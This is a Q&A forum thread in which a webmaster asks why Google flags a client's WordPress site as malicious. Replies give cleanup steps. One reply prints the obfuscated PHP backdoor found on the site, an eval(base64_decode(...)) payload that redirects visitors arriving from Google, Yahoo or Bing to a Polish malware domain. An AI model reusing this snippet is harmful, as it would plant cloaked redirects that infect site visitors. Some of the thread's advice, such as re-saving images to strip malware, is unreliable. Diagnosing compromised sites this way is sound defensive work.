# Google says my site contains malware

Tags: hacking, malware

my clients site http://bit.ly/dTOfGF (i used url shortener).

I have tried everything to find the malware but i couldnt.

I tried the Google checklist http://googlewebmastercentral.blogspot.com/2007/09/quick-security-checklist-for-webmasters.html

i checked for all script files in multiple browsers and couldn't find any...

Strange thing is that Google reports that png files and 1 css has malware...

Any help would be appreciated.

Thanks!

Comment: Does it say which files in particular have malware?

Comment: http://img683.imageshack.us/i/asduq.jpg/

Comment: did you get the report shown in image from Google webmaster tools? Because here there is a different report: http://www.google.com/safebrowsing/diagnostic?site=http://www.enhanceit.fi/&hl=en

Comment: yes i did but it didnt help the investigation... Why?

Comment: You might be interested in a similar question: http://webmasters.stackexchange.com/questions/8906/

Answer (score 3):

It's more than likely your WordPress install has been compromised.

The permanent fix is to follow these steps to ensure it is fully cleaned and to prevent a recurrence. This is the best method to ensure it is 100% clean.

1. Backup the database
2. Make a note of the customizations, such as plugins or any other modifications you’ve made.
3. Remove all files from the site, be sure to save anything that isn’t part of WordPress!
4. Reinstall WordPress
5. Restore the database
6. Verify the WordPress users are correct and authorized
7. Re-install any plugins you were using
8. Reload any additional .php files from known clean copy

This is the best way to ensure the site was not attacked previously and has hidden backdoors loaded deep into the site.

It is extremely important to keep your WordPress software up to date and use strong passwords for your WP admin, FTP and Database, and that you don’t use the same password for all of them.

Additional information: [GoDaddy case study](http://www.wpsecuritylock.com/cechriecom-com-script-wordpress-hacked-on-godaddy-case-study/)

Answer (score 1):

Remake those images, maybe even using screenshots, and re-save them and replace them in your site. Any malware hidden in them will be removed that way.

**Update**

That snippet contained code that, if a user found your site through Google, Yahoo, or Bing search, redirected users to a site in Poland that serves up a fake search page and tries to load malware on to a user's computer.

Comment: can png and css have malware??

Comment: @Karington - Yes, images can be malformed to make attacks. I'm not sure about CSS.

Comment: is there any anti-malware app that can check this?

Comment: @Karington - I don't know of any but it's possible that anti-virus software might detect it.

Comment: i tried kaspersky which is quite good and eset and no detection...

Answer (score 1):

This was in a php file that had chmod 666

```
eval(base64_decode("CglpZiAoc3RyaXN0cigkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCJnb29nbGUiKSkgewoJaWYgKCFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sIi5udSIpIGFuZCAhc3RyaXN0cigkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCJzaXRlIikgYW5kICFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sImludXJsIikpewoJCXByZWdfbWF0Y2ggKCIvcVw9KC4qKS8iLCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sJGtrKTsKCQlpZiAoc3RyaXN0cigka2tbMV0sIiYiKSkgewoJCQlwcmVnX21hdGNoICgiLyguKj8pXCYvIiwka2tbMV0sJGtleTIpOwoJCQkka2V5d29yZD11cmxkZWNvZGUoJGtleTJbMV0pOwoJCX1lbHNlIHsKCQkJJGtleXdvcmQ9dXJsZGVjb2RlKCRra1sxXSk7CgkJfQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9mZ25mZGZ0aHJ2LmJlZS5wbC8/cT0iLiRrZXl3b3JkKTsKCQlleGl0KCk7Cgl9Cgp9ZWxzZWlmIChzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sInlhaG9vIikpIHsKcHJlZ19tYXRjaCAoIi9wXD0oLio/KSYvIiwkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCRrayk7CgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2ZnbmZkZnRocnYuYmVlLnBsLz9xPSIuJGtrWzFdKTsKCQlleGl0KCk7Cn1lbHNlaWYgKHN0cmlzdHIoJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwiYmluZyIpKSB7CnByZWdfbWF0Y2ggKCIvcVw9KC4qPykmLyIsJF9TRVJWRVJbS FRU UF9SRUZFUkVSXSwka2spOwoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9mZ25mZGZ0aHJ2LmJlZS5wbC8/cT0iLiRra1sxXSk7CgkJZXhpdCgpOwp9Cgk="));
```

It only showed when it was visited through google yahoo or bing so i couldnt of seen the malware...

Comment: As far as I know, this hack uses stolen FTP passwords.